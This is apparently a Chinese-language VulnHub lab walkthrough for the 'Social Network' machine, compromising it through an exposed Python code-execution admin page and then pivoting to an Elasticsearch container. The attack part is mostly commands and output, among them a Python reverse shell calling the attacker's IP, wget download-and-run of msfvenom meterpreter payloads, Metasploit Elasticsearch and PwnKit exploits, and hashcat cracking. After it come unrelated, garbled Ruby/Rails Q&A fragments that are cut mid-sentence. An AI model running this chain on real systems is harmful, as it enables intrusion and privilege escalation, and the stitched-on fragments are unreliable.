作者:jason huawen
名称:
BoredHackerBlog: Social Network
地址:
https://www.vulnhub.com/entry/boredhackerblog-social-network,454/
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:06 1 60 Unknown vendor
192.168.56.100 08:00:27:af:83:c9 1 60 PCS Systemtechnik GmbH
192.168.56.254 08:00:27:87:d5:96 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254
┌──(kali㉿kali)-[~/Vulnhub/Socnet]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-08 00:38 EDT
Nmap scan report for www.armour.local (192.168.56.254)
Host is up (0.00029s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 cc5320b810db525f1602bcee572280e1 (DSA)
| 2048 0150f61f32e80dfc48383ec81bac2002 (RSA)
| 256 3bae9abdcbff8f546432ecbf38fdfe6b (ECDSA)
|_ 256 774e8b207352a4ee931db385f225d755 (ED25519)
5000/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.15)
|_http-title: Leave a message
MAC Address: 08:00:27:87:D5:96 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、5000(http)
──(kali㉿kali)-[~/Vulnhub/Socnet]
└─$ gobuster dir -u http://192.168.56.254:5000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.254:5000
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: js,html,txt,sh,php
[+] Timeout: 10s
===============================================================
2023/04/08 00:44:15 Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 200) [Size: 401]
发现了/admin目录,而我们在namp结果知道目标运行Python环境
当输入正确的python代码时,比如print("jason"),返回结果:
Status:
Ran the code
当故意输入有错误的python代码时,则返回结果:
Status:
Something went wrong with running the code
因此接下来设法得到反向shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
这里不需要前面的python -c
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.206",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
┌──(kali㉿kali)-[~/Vulnhub/Socnet]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 39946
/app # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/app # ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
4: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP
link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
valid_lft forever preferred_lft forever
/app #
这应该是在容器中。
将编译后的nmap上传到目标容器中
/app # which wget
/usr/bin/wget
/app # cd /tmp
/tmp # wget http://192.168.56.206:8000/nmap
Connecting to 192.168.56.206:8000 (192.168.56.206:8000)
nmap 100% |*******************************| 5805k 0:00:00 ETA
/tmp # chmod +x nmap
/tmp # ./nmap 172.17.0./16
/tmp # ./nmap 172.17.0.0/24
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2023-04-08 05:00 UTC
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 172.17.0.1
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (0.000042s latency).
Not shown: 1288 closed ports
PORT STATE SERVICE
22/tcp open ssh
MAC Address: 02:42:A1:9D:B7:15 (Unknown)
Nmap scan report for 172.17.0.3
Host is up (0.000044s latency).
Not shown: 1288 closed ports
PORT STATE SERVICE
9200/tcp open wap-wsp
MAC Address: 02:42:AC:11:00:03 (Unknown)
经过扫描发现172.17.0.3容器开放9200端口,运行elasticsearch服务
接下来利用metasploit工具生成meterpreter会话
┌──(kali㉿kali)-[~/Vulnhub/Socnet]
└─$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.206 LPORT=6666 -f elf -o escalate.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
Saved as: escalate.elf
将Mesfvenom工具生成的escalate.elf文件上传之目标容器(172.17.0.2)
/tmp # wget http://192.168.56.206:8000/escalate.elf
Connecting to 192.168.56.206:8000 (192.168.56.206:8000)
escalate.elf 100% |*******************************| 207 0:00:00 ETA
/tmp # chmod +x escalate.elf
/tmp # ./escalate.elf
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.56.206:6666
[*] Sending stage (1017704 bytes) to 192.168.56.254
[*] Meterpreter session 1 opened (192.168.56.206:6666 -> 192.168.56.254:53521) at 2023-04-08 01:11:37 -0400
meterpreter >
在Kali Linux上成功得到meterpreter会话,接下里建立端口转发,到172.17.0.3的elasticservice端口
meterpreter > run autoroute -s 172.17.0.0/16
meterpreter > portfwd add -l 9200 -p 9200 -r 172.17.0.3
[*] Forward TCP relay created: (local) :9200 -> (remote) 172.17.0.3:9200
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > search elasticsearch
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/elasticsearch/script_mvel_rce 2013-12-09 excellent Yes ElasticSearch Dynamic Script Arbitrary Java Execution
1 auxiliary/scanner/elasticsearch/indices_enum normal No ElasticSearch Indices Enumeration Utility
2 exploit/multi/elasticsearch/search_groovy_script 2015-02-11 excellent Yes ElasticSearch Search Groovy Sandbox Bypass
3 auxiliary/scanner/http/elasticsearch_traversal normal Yes ElasticSearch Snapshot API Directory Traversal
4 exploit/multi/misc/xdh_x_exec 2015-12-04 excellent Yes Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/multi/misc/xdh_x_exec
msf6 exploit(multi/handler) > use exploit/multi/elasticsearch/search_groovy_script
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/elasticsearch/search_groovy_script) > show options
Module options (exploit/multi/elasticsearch/search_groovy_script):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/us
ing-metasploit.html
RPORT 9200 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The path to the ElasticSearch REST API
VHOST no HTTP server virtual host
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 ElasticSearch 1.4.2
View the full module info with the info, or info -d command.
msf6 exploit(multi/elasticsearch/search_groovy_script) > set RHOSTS localhost
RHOSTS => localhost
msf6 exploit(multi/elasticsearch/search_groovy_script) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(multi/elasticsearch/search_groovy_script) > set LPORT 8888
LPORT => 8888
msf6 exploit(multi/elasticsearch/search_groovy_script) > run
[*] Exploiting target 0.0.0.1
[*] Started reverse TCP handler on 192.168.56.206:8888
[*] Checking vulnerability...
[-] Exploit aborted due to failure: unknown: 0.0.0.1:9200 - Java has not been executed, aborting...
[*] Exploiting target 127.0.0.1
[*] Started reverse TCP handler on 192.168.56.206:8888
[*] Checking vulnerability...
[*] Discovering TEMP path...
[+] TEMP path on '/tmp'
[*] Discovering remote OS...
[+] Remote OS is 'Linux'
[*] Trying to load metasploit payload...
[*] Sending stage (58829 bytes) to 192.168.56.254
[+] Deleted /tmp/IVCQL.jar
[*] Meterpreter session 2 opened (192.168.56.206:8888 -> 192.168.56.254:55487) at 2023-04-08 01:17:49 -0400
[*] Session 2 created in the background.
msf6 exploit(multi/elasticsearch/search_groovy_script) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/linux root @ 172.17.0.2 192.168.56.206:6666 -> 192.168.56.254:53521 (172.17.0.2)
2 meterpreter java/linux root @ 2c3ee4ccef61 192.168.56.206:8888 -> 192.168.56.254:55487 (127.0.0.1)
在172.17.0.3的shell中发现文件passwords
cat passwords
Format: number,number,number,number,lowercase,lowercase,lowercase,lowercase
Example: 1234abcd
john:3f8184a7343664553fcb5337a3138814
test:861f194e9d6118f3d942a72be3e51749
admin:670c3bbc209a18dde5446e5e6c1f1d5b
root:b3d34352fc26117979deabdf1b9b6354
jane:5c158b60ed97c723b673529b8a3cf72b
并且给出了密码的格式:
number,number,number,number,lowercase,lowercase,lowercase,lowercase
数字数字数字数字数字小写字母小写字母小写字母
接下里用hashcat进行破解
(kali㉿kali)-[~/Vulnhub/Socnet]
└─$ hashcat --username -m 0 -a 3 hashes -1 ?d -2 ?l ?1?1?1?1?2?2?2?2 --force
5c158b60ed97c723b673529b8a3cf72b:1234jane
b3d34352fc26117979deabdf1b9b6354:1234pass
670c3bbc209a18dde5446e5e6c1f1d5b:1111pass
861f194e9d6118f3d942a72be3e51749:1234test
得到john等的用户的密码,登录john的ssh:
然后
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.206 LPORT=6666 -f elf -o escalate.elf
将该payload上传到目标主机,同时在Kali LInux启动msfconsole,从而得到meterpreter会话,得到meterpreter会话后,利用suggester模块找到本地提权模块,然后提权到root
msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show options
Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):
Name Current Setting Required Description
---- --------------- -------- -----------
PKEXEC_PATH no The path to pkexec binary
SESSION yes The session to run this module on
WRITABLE_DIR /tmp yes A directory where we can write files
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 x86_64
View the full module info with the info, or info -d command.
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 8888
LPORT => 8888
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run
[*] Started reverse TCP handler on 192.168.56.206:8888
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.uvuqtex
[+] The target is vulnerable.
[*] Writing '/tmp/.qzwtfgo/woyhnxwzfn/woyhnxwzfn.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.qzwtfgo
meterpreter > shell
Process 1737 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),1001(john)
cd /root
ls -alh
total 20K
drwx------ 2 root root 4.0K Oct 28 2018 .
drwxr-xr-x 22 root root 4.0K Oct 27 2018 ..
-rw------- 1 root root 9 Oct 28 2018 .bash_history
-rw-r--r-- 1 root root 3.1K Feb 19 2014 .bashrc
-rw-r--r-- 1 root root 140 Feb 19 2014 .profile
从而得到root shell.
很好奇,就使用rubyonrails自动化单元测试而言,你们正在做什么?您是否创建了一个脚本来在cron中运行rake作业并将结果邮寄给您?git中的预提交Hook?只是手动调用?我完全理解测试,但想知道在错误发生之前捕获错误的最佳实践是什么。让我们理所当然地认为测试本身是完美无缺的,并且可以正常工作。下一步是什么以确保他们在正确的时间将可能有害的结果传达给您? 最佳答案 不确定您到底想听什么,但是有几个级别的自动代码库控制:在处理某项功能时,您可以使用类似autotest的内容获得关于哪些有效,哪些无效的即时反馈。要确保您的提
我正在编写一个包含C扩展的gem。通常当我写一个gem时,我会遵循TDD的过程,我会写一个失败的规范,然后处理代码直到它通过,等等......在“ext/mygem/mygem.c”中我的C扩展和在gemspec的“扩展”中配置的有效extconf.rb,如何运行我的规范并仍然加载我的C扩展?当我更改C代码时,我需要采取哪些步骤来重新编译代码?这可能是个愚蠢的问题,但是从我的gem的开发源代码树中输入“bundleinstall”不会构建任何native扩展。当我手动运行rubyext/mygem/extconf.rb时,我确实得到了一个Makefile(在整个项目的根目录中),然后当
我有一个围绕一些对象的包装类,我想将这些对象用作散列中的键。包装对象和解包装对象应映射到相同的键。一个简单的例子是这样的:classAattr_reader:xdefinitialize(inner)@inner=innerenddefx;@inner.x;enddef==(other)@inner.x==other.xendenda=A.new(o)#oisjustanyobjectthatallowso.xb=A.new(o)h={a=>5}ph[a]#5ph[b]#nil,shouldbe5ph[o]#nil,shouldbe5我试过==、===、eq?并散列所有无济于事。
我有一些Ruby代码,如下所示:Something.createdo|x|x.foo=barend我想编写一个测试,它使用double代替block参数x,这样我就可以调用:x_double.should_receive(:foo).with("whatever").这可能吗? 最佳答案 specify'something'dox=doublex.should_receive(:foo=).with("whatever")Something.should_receive(:create).and_yield(x)#callthere
Sinatra新手;我正在运行一些rspec测试,但在日志中收到了一堆不需要的噪音。如何消除日志中过多的噪音?我仔细检查了环境是否设置为:test,这意味着记录器级别应设置为WARN而不是DEBUG。spec_helper:require"./app"require"sinatra"require"rspec"require"rack/test"require"database_cleaner"require"factory_girl"set:environment,:testFactoryGirl.definition_file_paths=%w{./factories./test/
我遵循MichaelHartl的“RubyonRails教程:学习Web开发”,并创建了检查用户名和电子邮件长度有效性的测试(名称最多50个字符,电子邮件最多255个字符)。test/helpers/application_helper_test.rb的内容是:require'test_helper'classApplicationHelperTest在运行bundleexecraketest时,所有测试都通过了,但我看到以下消息在最后被标记为错误:ERROR["test_full_title_helper",ApplicationHelperTest,1.820016791]test
我已经构建了一些serverspec代码来在多个主机上运行一组测试。问题是当任何测试失败时,测试会在当前主机停止。即使测试失败,我也希望它继续在所有主机上运行。Rakefile:namespace:specdotask:all=>hosts.map{|h|'spec:'+h.split('.')[0]}hosts.eachdo|host|begindesc"Runserverspecto#{host}"RSpec::Core::RakeTask.new(host)do|t|ENV['TARGET_HOST']=hostt.pattern="spec/cfengine3/*_spec.r
我在app/helpers/sessions_helper.rb中有一个帮助程序文件,其中包含一个方法my_preference,它返回当前登录用户的首选项。我想在集成测试中访问该方法。例如,这样我就可以在测试中使用getuser_path(my_preference)。在其他帖子中,我读到这可以通过在测试文件中包含requiresessions_helper来实现,但我仍然收到错误NameError:undefinedlocalvariableormethod'my_preference'.我做错了什么?require'test_helper'require'sessions_hel
只是想确保我理解了事情。据我目前收集到的信息,Cucumber只是一个“包装器”,或者是一种通过将事物分类为功能和步骤来组织测试的好方法,其中实际的单元测试处于步骤阶段。它允许您根据事物的工作方式组织您的测试。对吗? 最佳答案 有点。它是一种组织测试的方式,但不仅如此。它的行为就像最初的Rails集成测试一样,但更易于使用。这里最大的好处是您的session在整个Scenario中保持透明。关于Cucumber的另一件事是您(应该)从使用您的代码的浏览器或客户端的角度进行测试。如果您愿意,您可以使用步骤来构建对象和设置状态,但通常您
我有:When/^(?:|I)follow"([^"]*)"(?:within"([^"]*)")?$/do|link,selector|with_scope(selector)doclick_link(link)endend我打电话的地方:Background:GivenIamanexistingadminuserWhenIfollow"CLIENTS"我的HTML是这样的:CLIENTS我一直收到这个错误:.F-.F--U-----U(::)failedsteps(::)nolinkwithtitle,idortext'CLIENTS'found(Capybara::Element